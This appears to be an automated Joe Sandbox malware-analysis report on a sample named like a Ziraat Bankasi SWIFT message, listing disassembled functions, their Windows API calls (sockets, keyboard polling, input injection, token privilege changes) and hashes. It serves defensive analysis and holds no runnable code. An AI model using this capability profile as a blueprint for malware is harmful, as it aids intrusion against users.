Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 5a1e262dc4657b631ec4dedeeee87272a643b67e34ced5d48db3d6a46d6b0935
Instruction ID: 71284d63fa56042ef72b6cfc583678fff12cd63b594099d103021e1959cf4fb7
Opcode Fuzzy Hash: 5a1e262dc4657b631ec4dedeeee87272a643b67e34ced5d48db3d6a46d6b0935
Instruction Fuzzy Hash: D701D4716582116AF76C27B89C4AFBF32989B40340F14082CF95BA20D2D6A09E0089A6

Function 000D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 000D8CA8
WSAGetLastError.WSOCK32(00000000), ref: 000D8CB7
bind.WSOCK32(00000000,?,00000010), ref: 000D8CD3
listen.WSOCK32(00000000,00000005), ref: 000D8CE2
WSAGetLastError.WSOCK32(00000000), ref: 000D8CFC
closesocket.WSOCK32(00000000), ref: 000D8D10

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: f03af0d513f688e570a3fb93d22acac0de13ce3ad32fcc260cecf02b83b8cd5f
Instruction ID: a55719ee9f70661589468afa9db3b36cf3e95e6d86a68ad7cd024a83aa544aad
Opcode Fuzzy Hash: f03af0d513f688e570a3fb93d22acac0de13ce3ad32fcc260cecf02b83b8cd5f
Instruction Fuzzy Hash: A921B131600200EFCB10EF68DD45BAEB7E9EF48714F148159F956A73D2CB70AD419B61

Function 000C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 000C6583
__wsplitpath.LIBCMT ref: 000C65A7
_wcscat.LIBCMT ref: 000C65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C65F9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 45f821d77d1d0f79f305f550290d673c178ac9a5c81520f3a6c2d2b17c32bf4e
Instruction ID: 45e7f6f379e2fefbc329237ef5dc9e2f57e327b94e852ec4b79cb6203d035057
Opcode Fuzzy Hash: 45f821d77d1d0f79f305f550290d673c178ac9a5c81520f3a6c2d2b17c32bf4e
Instruction Fuzzy Hash: B721A771900218ABDB20ABE4DC88FDDB7FCAB09300F6000A9F545E7141DBB19F85CB61

Function 000D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000DA82C: inet_addr.WSOCK32(00000000), ref: 000DA84E

socket.WSOCK32(00000002,00000002,00000011), ref: 000D9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 000D92B9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 437eead9e32cb0ffbe3f255da28601ece6b55259ca0e3889feaa067ee27249db
Instruction ID: 59d2dc17e73a04dbf525aba01864885dff51312c7fea97cb9b4896f1916014fa
Opcode Fuzzy Hash: 437eead9e32cb0ffbe3f255da28601ece6b55259ca0e3889feaa067ee27249db
Instruction Fuzzy Hash: 1341C070600200AFDB14BB68CC82EBE77EDEF44728F044459F956AB383DB749E419BA1

Function 000CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000CEB8A
_wcscmp.LIBCMT ref: 000CEBBA
_wcscmp.LIBCMT ref: 000CEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 000CEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 000CEC0E

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 75d1e9101a4fe5619f5d355c2b6c5cb4bfed2e3260d0fa55d0e5278fdaf11080
Instruction ID: fdb0d4ef1403e3339506f1b5635473680195d7be455042ac72acbf863f24fbf8
Opcode Fuzzy Hash: 75d1e9101a4fe5619f5d355c2b6c5cb4bfed2e3260d0fa55d0e5278fdaf11080
Instruction Fuzzy Hash: D941AC75600602DFCB18DF68C491EAEB7E4FF49324F10455DE96A8B3A2DB31E981CB91

Function 0009B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0009B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
GetAsyncKeyState.USER32(00000001), ref: 0009B691
GetAsyncKeyState.USER32(00000002), ref: 0009B69F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: e9f77112ea6d2061462f9c64a3a7f2d8b1c6186daf906ab6683ae798f9b1c6d7
Instruction ID: 2bf51be2a989cfa429ac0fd91735d9180343f6c5b8c9f40a5644f9640469c06d
Opcode Fuzzy Hash: e9f77112ea6d2061462f9c64a3a7f2d8b1c6186daf906ab6683ae798f9b1c6d7
Instruction Fuzzy Hash: F7418E35508119BFCF159F64C844EEDBBB5BB05324F10432AE869922E0CB34A994EF91

Function 0009E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0009E014,771B0AE0,0009DEF1,0011DC38,?,?), ref: 0009E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0009E03E

Strings

GetNativeSystemInfo, xrefs: 0009E038
kernel32.dll, xrefs: 0009E027

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a477f7dce2030742f192c92c7535ca7ec09638a1ec068c6ad232bcfe476f05ce
Instruction ID: 55a8f19c375d22b00fae1e3d6b2fb080b21af6aa970aa9d6a46e016d9b21d5b2
Opcode Fuzzy Hash: a477f7dce2030742f192c92c7535ca7ec09638a1ec068c6ad232bcfe476f05ce
Instruction Fuzzy Hash: 6FD0A7304007129FCB31AFA1FC0961276D5AB04301F188429E4C1D25A0FBF4CCC08650

Function 000BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000BAA79
Part of subcall function 000BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000BAA83
Part of subcall function 000BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000BAA92
Part of subcall function 000BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000BAA99
Part of subcall function 000BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000BAAAF

GetLengthSid.ADVAPI32(?,00000000,000BADE4,?,?), ref: 000BB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 000BB227
HeapAlloc.KERNEL32(00000000), ref: 000BB22E
CopySid.ADVAPI32(?,00000000,?), ref: 000BB247

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 8346d88b7dba1e87ac56b0662b5c953c7ce33a8a21650698e888bfb2f7ebc966
Instruction ID: c068b037d1d2560ba95da2ac26919ae85f9dc2f6eda284f12e081eacde8a738a
Opcode Fuzzy Hash: 8346d88b7dba1e87ac56b0662b5c953c7ce33a8a21650698e888bfb2f7ebc966
Instruction Fuzzy Hash: DA119E71A00205EFDB149F98DC85AEEB7E9EF95304F14802DE98297211D7B1AE84CB20

Function 000C13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 000C13DC

Strings

(, xrefs: 000C1422
|, xrefs: 000C140C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: fa8a3e9911030b5596ed1b4c6d75a0021293980280243a9aac0242d925149be9
Instruction ID: 528440eac43490d8bcdb42a89a9426593c38d58c7c7e45f462fe97e5fecc5229
Opcode Fuzzy Hash: fa8a3e9911030b5596ed1b4c6d75a0021293980280243a9aac0242d925149be9
Instruction Fuzzy Hash: 76321475A046059FCB28CF69C480EAAB7F0FF49320B15C56EE59ADB3A2D770E941CB44

Function 0009B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0009B22F

Part of subcall function 0009B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0009B5A5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 357e3614c41f74d56b5eae659865f0b78d62e719ab94dbf8034664b4224d49a8
Instruction ID: 7220eb3c1a005216183d0a179d6e36d9ee5d7b04787a99644b1789a4b0ab3ef8
Opcode Fuzzy Hash: 357e3614c41f74d56b5eae659865f0b78d62e719ab94dbf8034664b4224d49a8
Instruction Fuzzy Hash: 15A17B70114149BADF78AF6ABE88EBF39DDEB42760B50411DF501E29B3CB149D00B272

Function 000D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000D43BF,00000000), ref: 000D4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000D4FD2

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 58aa558d3c6d7fcdffdfbab08b1d7e957b29fa5f8fc8a5e1fa725f2b01694ae5
Instruction ID: d6e186ba5dd68b03dfc885829a068292add6d929a42b1aa8fab1dad6413a5046
Opcode Fuzzy Hash: 58aa558d3c6d7fcdffdfbab08b1d7e957b29fa5f8fc8a5e1fa725f2b01694ae5
Instruction Fuzzy Hash: D141C371504709BFEB209F94DC85EBFB7FCEB40759F10402BF605A6291EA719E4196B0

Function 000CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000CE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000CE2B4

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 0e657a1e34d76032e08672d895af5918179c2ccdb929c5277b0747635cabe3fa
Instruction ID: 4a7796efe4930f4ef5f22f7c25b900d7e8cb5d7d8b3d139c332056ba87e30333
Opcode Fuzzy Hash: 0e657a1e34d76032e08672d895af5918179c2ccdb929c5277b0747635cabe3fa
Instruction Fuzzy Hash: BC213C75A00118EFDB00EFA5D885EEDFBB8FF48314F0484A9E945A7252DB319945CB50

Function 000BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BB1AD
GetLastError.KERNEL32 ref: 000BB1BA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 04f4546dd4a1c25380a2d4ddc72ca3cd4e36490dd5c317341c75e952b8574e5d
Instruction ID: 90611cf94123f7d3462baad57d5b754d23dc19effd26130c979cce03fbc9d63a
Opcode Fuzzy Hash: 04f4546dd4a1c25380a2d4ddc72ca3cd4e36490dd5c317341c75e952b8574e5d
Instruction Fuzzy Hash: 2F118FB1504605AFE7189F68EC85D6BB7BDFB44710B20892EF49697641DBB0FC418B60

Function 000C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000C7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000C723A
FreeSid.ADVAPI32(?), ref: 000C724A

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: ec122a4ed30714feb4e5696760773bedf4a89828dea0ba888dd80b901247c307
Instruction ID: d74c9aa4a053ae408789c38875a7c99a1ff60873a576341bb7bd2d66f20505b3
Opcode Fuzzy Hash: ec122a4ed30714feb4e5696760773bedf4a89828dea0ba888dd80b901247c307
Instruction Fuzzy Hash: 31F01D76A04209BFDF04DFE4DD89EEEBBB8EF08201F104469B606E2591E2709A448B10

Function 000CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000CF599
FindClose.KERNEL32(00000000), ref: 000CF5C9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c60176f95fbf315dd554f2ecaf5a5269479e97832b0fc5536ca72fce2f257e85
Instruction ID: 48c5b87a1a6713652d2cb60dd8edd680e45753dc59ea4a9c3567a91fabc202c8
Opcode Fuzzy Hash: c60176f95fbf315dd554f2ecaf5a5269479e97832b0fc5536ca72fce2f257e85
Instruction Fuzzy Hash: A711A1726006009FDB10EF28D845E6EB3E9FF98324F00895EF9A9D7291CB70E9018B81

Function 000CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,000DBE6A,?,00000000,00000000,?), ref: 000CCEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,000DBE6A,?,00000000,00000000,?), ref: 000CCEB9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 96a1511786418f200f1e888da2a4ca0842ad78ba39efe61aaa00f15d5366f7c3
Instruction ID: 76abceb3f3908b19b91e575a149989f4a13d983fed2f9939faa243f932e3920b
Opcode Fuzzy Hash: 96a1511786418f200f1e888da2a4ca0842ad78ba39efe61aaa00f15d5366f7c3
Instruction Fuzzy Hash: 4EF08275100229ABEB20ABE4DC49FEE776DBF09391F004166F959D6181D7709A40CBA4

Function 000C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 000C4153
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 000C4166

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: e7a5ab19187257ddb031508dc40da613b6e6647b4137ebcd3d6873ffeced98c7
Instruction ID: 6128aff8e51329f4da7b7f2b8075da3f077e7ff190f5ad942c9af82c56cc5d33
Opcode Fuzzy Hash: e7a5ab19187257ddb031508dc40da613b6e6647b4137ebcd3d6873ffeced98c7
Instruction Fuzzy Hash: CBF0677080024DAFDB159FA0CC05BBE7FB0FF00305F04800AFDA6A6192D7B986529FA0

Function 000BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 000BAB99
CloseHandle.KERNEL32(?), ref: 000BABAB

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 33a5af5befce3c5077f04efc1e32b53866659fc839ae673daf3e31911ae057af
Instruction ID: 04b3961ea278440d75af0226e5526031f614d9fa705b132e83795be24ba03d1f
